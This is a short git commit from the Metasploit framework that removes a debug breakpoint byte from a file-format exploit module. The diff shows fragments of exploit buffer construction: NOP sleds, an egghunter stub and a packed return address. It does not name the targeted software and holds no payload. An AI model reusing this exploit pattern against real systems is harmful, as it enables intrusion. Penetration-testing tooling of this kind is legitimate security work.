remove debug code

git-svn-id: file:///home/svn/framework3/trunk@7756 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-12-08 19:52:15 +00:00
parent 6ae2293a79
commit cb5d02af20
1 changed files with 3 additions and 3 deletions

View File

@ -8,7 +8,8 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Egghunter
@ -64,8 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
off = target['Offset']
idxf = ""
idxf << make_nops(off - eh_stub.length - 1)
idxf << "\xcc"
idxf << make_nops(off - eh_stub.length)
idxf << eh_stub
idxf << [target.ret].pack('V')